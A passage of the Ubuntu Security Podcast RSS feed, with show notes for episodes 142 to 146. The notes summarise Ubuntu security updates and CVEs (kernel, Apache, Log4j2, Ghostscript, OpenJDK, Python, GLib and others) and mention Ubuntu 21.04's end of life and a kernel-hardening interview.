<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22555">CVE-2021-22555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25020">CVE-2018-25020</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various recent high priority CVEs now available as a livepatch
<ul>
<li>Including hugepages issue above as well as</li>
<li>eBPF verifier issue</li>
<li>AMD specific issue with KVM -&gt; guest to host memory write</li>
<li>OOB write in netfilter</li>
<li>VFS OOB write</li>
</ul>
</li>
<li>All could lead to code execution by a relatively unprivileged user into
the kernel</li>
</ul>
<h3 id="usn-5212-1-usn-5212-2-apache-http-server-vulnerabilities-08-54">[<a href="https://ubuntu.com/security/notices/USN-5212-1">USN-5212-1</a>, <a href="https://ubuntu.com/security/notices/USN-5212-2">USN-5212-2</a>] Apache HTTP Server vulnerabilities [08:54]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44790">CVE-2021-44790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44224">CVE-2021-44224</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible NULL ptr deref when configured as a forward proxy (<code>ProxyRequests on</code>)</li>
<li>Possible SSRF when configured as both a forward and reverse proxy</li>
</ul>
<h3 id="usn-5213-1-webkitgtk-vulnerabilities-09-37">[<a href="https://ubuntu.com/security/notices/USN-5213-1">USN-5213-1</a>] WebKitGTK vulnerabilities [09:37]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30890">CVE-2021-30890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30887">CVE-2021-30887</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>&ldquo;Universal&rdquo; XSS and Content Security Policy bypass
<ul>
<li>both come from upstream webkit</li>
</ul>
</li>
</ul>
<h3 id="usn-5043-2-exiv2-regression-10-10">[<a href="https://ubuntu.com/security/notices/USN-5043-2">USN-5043-2</a>] Exiv2 regression [10:10]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-37620">CVE-2021-37620</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Gwenview crash when opening images exported by darktable
<ul>
<li>gwenview uses exiv2 for metadata handling</li>
<li>recent security update for exiv2 introduced a regression</li>
</ul>
</li>
<li>Thanks Simon Schmeißer from the Ubuntu community for contributing the
debdiff to fix this issue</li>
</ul>
<h3 id="usn-5222-1-apache-log4j-2-vulnerabilities-11-06">[<a href="https://ubuntu.com/security/notices/USN-5222-1">USN-5222-1</a>] Apache Log4j 2 vulnerabilities [11:06]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45105">CVE-2021-45105</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44832">CVE-2021-44832</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Moar log4j2
<ul>
<li>Another instance of JNDI RCE but this time needed to have configured to
use a JDBC appender - ie configured to write event logs to a relational
database table via standard JDBC</li>
<li>Uncontrolled recursion via self-referential lookups - but requires an
attacker to be able to control Thread Context Map data as well as be
able to supply crafted strings to get logged</li>
</ul>
</li>
</ul>
<h3 id="usn-5224-1-ghostscript-vulnerabilities-12-21">[<a href="https://ubuntu.com/security/notices/USN-5224-1">USN-5224-1</a>] Ghostscript vulnerabilities [12:21]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45949">CVE-2021-45949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45944">CVE-2021-45944</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Hello Ghostscript my old friend!</li>
<li>2 issues discovered by oss-fuzz (used to be all Tavis Ormandy, but those
were more logic bugs in the sandbox etc) - in this case a UAF and a heap
buffer overflow -&gt; crash / RCE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-21-dot-04-eol-13-31">Ubuntu 21.04 EOL [13:31]</h3>
<ul>
<li>Next week on 20th January Ubuntu 21.04 goes EOL</li>
<li>No more bug fix or security updates from then onwards</li>
<li>Now is the perfect time to upgrade to Ubuntu 21.10 which is supported for
another 6 months more until July 2022</li>
</ul>
<h3 id="ubuntu-security-podcast-back-on-break-for-2-weeks-14-37">Ubuntu Security Podcast back on break for 2 weeks [14:37]</h3>
<ul>
<li>22.04 mid-cycle sprint week</li>
<li>holiday</li>
<li>back in 3 weeks time (end of first week of February)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E146.mp3" length="12242139" type="audio/mpeg" /><itunes:duration>16:12</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 145
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-145/</link>
          <pubDate>Thu, 06 Jan 2022 16:09:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b81f2062c310f710fd3a1cd961125e1c67cf180c6fe98bba59f753e29f3b3870c59f701a99a475f9e91d8f82920249b9e8dc71001aa1b981d2e30a4074220d00</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 145</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The Ubuntu Security Podcast is back for 2022 and we're starting off the
  year with a bang💥! This week we bring you a special interview with Kees
  Cook of Google and the Linux Kernel Self Protection Project discussing
  Linux kernel...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The Ubuntu Security Podcast is back for 2022 and we're starting off the
  year with a bang💥! This week we bring you a special interview with Kees
  Cook of Google and the Linux Kernel Self Protection Project discussing
  Linux kernel hardening upstream developments. Plus we look at security
  updates for Mumble, Apache Log4j2, OpenJDK and more.
  </itunes:summary>
        <description>  The Ubuntu Security Podcast is back for 2022 and we're starting off the
  year with a bang💥! This week we bring you a special interview with Kees
  Cook of Google and the Linux Kernel Self Protection Project discussing
  Linux kernel hardening upstream developments. Plus we look at security
  updates for Mumble, Apache Log4j2, OpenJDK and more.
  </description>
        <googleplay:description>  The Ubuntu Security Podcast is back for 2022 and we're starting off the
  year with a bang💥! This week we bring you a special interview with Kees
  Cook of Google and the Linux Kernel Self Protection Project discussing
  Linux kernel hardening upstream developments. Plus we look at security
  updates for Mumble, Apache Log4j2, OpenJDK and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The Ubuntu Security Podcast is back for 2022 and we&rsquo;re starting off the
year with a bang💥! This week we bring you a special interview with Kees
Cook of Google and the Linux Kernel Self Protection Project discussing
Linux kernel hardening upstream developments. Plus we look at security
updates for Mumble, Apache Log4j2, OpenJDK and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>31 unique CVEs addressed</p>
<h3 id="usn-5195-1-mumble-vulnerability-01-02">[<a href="https://ubuntu.com/security/notices/USN-5195-1">USN-5195-1</a>] Mumble vulnerability [01:02]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27229">CVE-2021-27229</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Low-latency VoIP client - client / server model</li>
<li>Client picks a server to connect to from public server list</li>
<li>Malicious actor could register a server with a web URL that uses some
other protocol - e.g. <code>smb</code> to then refer to a <code>.desktop</code> file</li>
<li>When user chose the option to &lsquo;Open Webpage&rsquo; for that server, would
automatically fetch and execute via underlying Qt framework libraries
<code>QDesktopServices::openUrl</code> function</li>
<li>Fixed to check URI scheme and only open if is http/https</li>
<li>Wonder if this kind of vuln may be seen in other applications?</li>
</ul>
<h3 id="usn-5192-2-apache-log4j-2-vulnerability-02-13">[<a href="https://ubuntu.com/security/notices/USN-5192-2">USN-5192-2</a>] Apache Log4j 2 vulnerability [02:13]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44228">CVE-2021-44228</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Log4j2 update for 16.04 ESM - see <a href="https://ubuntusecuritypodcast.org/episode-142/">Episode 142</a></li>
</ul>
<h3 id="usn-5203-1-apache-log4j-2-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5203-1">USN-5203-1</a>] Apache Log4j 2 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45105">CVE-2021-45105</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More Log4j2 vulns - possible to crash applications using log4j2 by
specifying a crafted string that would get logged which would then cause
infinite recursion when doing lookup evaluation</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell</a></li>
</ul>
<h3 id="usn-5202-1-openjdk-vulnerabilities-03-13">[<a href="https://ubuntu.com/security/notices/USN-5202-1">USN-5202-1</a>] OpenJDK vulnerabilities [03:13]</h3>
<ul>
<li>14 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-35603">CVE-2021-35603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35588">CVE-2021-35588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35586">CVE-2021-35586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35578">CVE-2021-35578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35567">CVE-2021-35567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35565">CVE-2021-35565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35564">CVE-2021-35564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35561">CVE-2021-35561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35559">CVE-2021-35559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35556">CVE-2021-35556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35550">CVE-2021-35550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2388">CVE-2021-2388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2369">CVE-2021-2369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2341">CVE-2021-2341</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mix of issues resolved with this latest point release update for
openjdk-8 and openjdk-11</li>
<li>Info leak via FTP client impl when connecting to malicious FTP server</li>
<li>Mishandling of JARs with multiple manifests -&gt; signature verification bypass</li>
<li>Sandbox escape via crafted Java class</li>
<li>Use of weak crypto ciphers by default -&gt; info leak</li>
<li>DoS via malicious RTF, BMP or class files</li>
<li>and more&hellip;</li>
</ul>
<h3 id="usn-5199-1-usn-5200-1-usn-5201-1-python-vulnerabilities-04-26">[<a href="https://ubuntu.com/security/notices/USN-5199-1">USN-5199-1</a>, <a href="https://ubuntu.com/security/notices/USN-5200-1">USN-5200-1</a>, <a href="https://ubuntu.com/security/notices/USN-5201-1">USN-5201-1</a>] Python vulnerabilities [04:26]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04) for Python 3.8/3.9
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3737">CVE-2021-3737</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 CVEs addressed in Bionic (18.04 LTS) for Python 3.6
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3737">CVE-2021-3737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3733">CVE-2021-3733</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 CVEs addressed in Bionic (18.04 LTS) for Python 3.7/3.8
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3737">CVE-2021-3737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3733">CVE-2021-3733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8492">CVE-2020-8492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 different DoS via urllib http client
<ul>
<li>infinite loop when handling <code>100 Continue</code> responses - malicious HTTP
server could cause a DoS against clients - affects all</li>
<li>ReDoS due to quadratic complexity regex in basic auth handling - only
affects Python 3.6-&gt;3.8 in Ubuntu 18.04</li>
<li>Similar but different ReDos in basic auth handling - only affects
Python 3.7/3.8 in Ubuntu 18.04</li>
</ul>
</li>
</ul>
<h3 id="usn-5198-1-htmldoc-vulnerability-05-37">[<a href="https://ubuntu.com/security/notices/USN-5198-1">USN-5198-1</a>] HTMLDOC vulnerability [05:37]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23180">CVE-2021-23180</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to covert HTML/Markdown files to generate EPUB/HTML/PS/PDF with ToC
etc</li>
<li>Through fuzzing a NULL ptr deref was found if given crafted input HTML
file -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-5186-2-firefox-regressions-06-06">[<a href="https://ubuntu.com/security/notices/USN-5186-2">USN-5186-2</a>] Firefox regressions [06:06]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43540">CVE-2021-43540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43546">CVE-2021-43546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43545">CVE-2021-43545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43543">CVE-2021-43543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43542">CVE-2021-43542</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43541">CVE-2021-43541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43539">CVE-2021-43539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43538">CVE-2021-43538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43537">CVE-2021-43537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43536">CVE-2021-43536</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>95.0.1
<ul>
<li>WebRender crash on some X11 systems</li>
<li>Failure to connect to microsoft.com domains</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="seth-and-john-talk-linux-kernel-security-with-kees-cook-06-53">Seth and John talk Linux Kernel Security with Kees Cook [06:53]</h3>
<ul>
<li>Seth Arnold and John Johansen from the Ubuntu Security team chat with
<a href="https://twitter.com/kees_cook">Kees Cook</a> from Google (KSPP) about Linux kernel hardening and
self-protection, including KASLR and FGKASLR, delving into the finer
points of linker scripts, kernel address pointer info leaks through debug
logs, detecting possible integer overflows in C by relying on undefined
behaviour of signed integer wraparound, hardware support for detecting
memory corruption and more.</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E145.mp3" length="31032397" type="audio/mpeg" /><itunes:duration>56:49</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 144
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-144/</link>
          <pubDate>Fri, 31 Dec 2021 11:00:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>eba1702b81989389c4b15460e8aee8d5dc7fcf4b558b2742cf70b9e1d93293da7c5630f318bbe4dbf05c8e2a92aa88bf85ae7c2e20b86ddd6a368d83847ed870</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 144</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Happy holidays! This week we bring you the second part of a special
  two-part holiday themed feature by Camila from the Ubuntu Security team
  discussing how best to protect yourself and your systems from the top cyber
  threats faced...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Happy holidays! This week we bring you the second part of a special
  two-part holiday themed feature by Camila from the Ubuntu Security team
  discussing how best to protect yourself and your systems from the top cyber
  threats faced during the holidays.
  </itunes:summary>
        <description>  Happy holidays! This week we bring you the second part of a special
  two-part holiday themed feature by Camila from the Ubuntu Security team
  discussing how best to protect yourself and your systems from the top cyber
  threats faced during the holidays.
  </description>
        <googleplay:description>  Happy holidays! This week we bring you the second part of a special
  two-part holiday themed feature by Camila from the Ubuntu Security team
  discussing how best to protect yourself and your systems from the top cyber
  threats faced during the holidays.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Happy holidays! This week we bring you the second part of a special
two-part holiday themed feature by Camila from the Ubuntu Security team
discussing how best to protect yourself and your systems from the top cyber
threats faced during the holidays.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E144.mp3" length="11838340" type="audio/mpeg" /><itunes:duration>18:18</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 143
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-143/</link>
          <pubDate>Sat, 25 Dec 2021 09:40:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>f937752e55884f70add548bcd1bb8be350c5f932a84286011a23c169753c2d381955b0323e941d6d9a9b3dfee8be41481479b23031d41e312fbd3e81d595a34d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 143</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Happy holidays! This week we bring you the first part of a special two-part
  holiday themed feature by Camila from the Ubuntu Security team discussing
  the top cyber threats faced during the holidays.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Happy holidays! This week we bring you the first part of a special two-part
  holiday themed feature by Camila from the Ubuntu Security team discussing
  the top cyber threats faced during the holidays.
  </itunes:summary>
        <description>  Happy holidays! This week we bring you the first part of a special two-part
  holiday themed feature by Camila from the Ubuntu Security team discussing
  the top cyber threats faced during the holidays.
  </description>
        <googleplay:description>  Happy holidays! This week we bring you the first part of a special two-part
  holiday themed feature by Camila from the Ubuntu Security team discussing
  the top cyber threats faced during the holidays.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Happy holidays! This week we bring you the first part of a special two-part
holiday themed feature by Camila from the Ubuntu Security team discussing
the top cyber threats faced during the holidays.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E143.mp3" length="16287014" type="audio/mpeg" /><itunes:duration>24:53</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 142
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-142/</link>
          <pubDate>Thu, 16 Dec 2021 17:23:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>76c9a80d8f71eff60bf88de32c2ee316a8d7306bd7751cedbfde05dcdad8cd4afafc75f1d0cf062ea25fc62d908817fb210b44f30244aa46fbbcd1c2acfba01a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 142</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Just in time for the holidays, Log4Shell comes along to wreck everyone's
  weekend - so we take a deep dive into the vulnerability that has set the
  internet on fire, plus we cover security updates for BlueZ, Firefox,
  Flatpak and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Just in time for the holidays, Log4Shell comes along to wreck everyone's
  weekend - so we take a deep dive into the vulnerability that has set the
  internet on fire, plus we cover security updates for BlueZ, Firefox,
  Flatpak and more.
  </itunes:summary>
        <description>  Just in time for the holidays, Log4Shell comes along to wreck everyone's
  weekend - so we take a deep dive into the vulnerability that has set the
  internet on fire, plus we cover security updates for BlueZ, Firefox,
  Flatpak and more.
  </description>
        <googleplay:description>  Just in time for the holidays, Log4Shell comes along to wreck everyone's
  weekend - so we take a deep dive into the vulnerability that has set the
  internet on fire, plus we cover security updates for BlueZ, Firefox,
  Flatpak and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Just in time for the holidays, Log4Shell comes along to wreck everyone&rsquo;s
weekend - so we take a deep dive into the vulnerability that has set the
internet on fire, plus we cover security updates for BlueZ, Firefox,
Flatpak and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>27 unique CVEs addressed</p>
<h3 id="usn-5183-1-bluez-vulnerability-00-48">[<a href="https://ubuntu.com/security/notices/USN-5183-1">USN-5183-1</a>] BlueZ vulnerability [00:48]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8922">CVE-2019-8922</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap based buffer overflow when handling overly large SDP requests -
crash / possible code execution as a result</li>
</ul>
<h3 id="usn-5186-1-firefox-vulnerabilities-01-08">[<a href="https://ubuntu.com/security/notices/USN-5186-1">USN-5186-1</a>] Firefox vulnerabilities [01:08]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43540">CVE-2021-43540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43546">CVE-2021-43546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43545">CVE-2021-43545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43543">CVE-2021-43543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43542">CVE-2021-43542</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43541">CVE-2021-43541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43539">CVE-2021-43539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43538">CVE-2021-43538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43537">CVE-2021-43537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43536">CVE-2021-43536</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>95.0</li>
</ul>
<h3 id="usn-5189-1-glib-vulnerability-01-34">[<a href="https://ubuntu.com/security/notices/USN-5189-1">USN-5189-1</a>] GLib vulnerability [01:34]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3800">CVE-2021-3800</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>By setting the <code>GLIB_CHARSETALIAS_DIR</code> env var, could then possibly exploit
setuid binaries like <code>pkexec</code> which are linked against glib to possibly
read root-owned files - fixed to just have glib not read and use this
environment variable</li>
</ul>
<h3 id="usn-5142-3-samba-regression-02-29">[<a href="https://ubuntu.com/security/notices/USN-5142-3">USN-5142-3</a>] Samba regression [02:29]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3738">CVE-2021-3738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23192">CVE-2021-23192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25721">CVE-2020-25721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25719">CVE-2020-25719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25718">CVE-2020-25718</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a>, <a href="https://ubuntusecuritypodcast.org/episode-141/">Episode 141</a> - yet another upstream regression in Samba due
to the most recent set of security updates which we discussed a month ago
in episode 138</li>
</ul>
<h3 id="usn-5174-2-samba-regression">[<a href="https://ubuntu.com/security/notices/USN-5174-2">USN-5174-2</a>] Samba regression</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a> <!-- raw HTML omitted --></li>
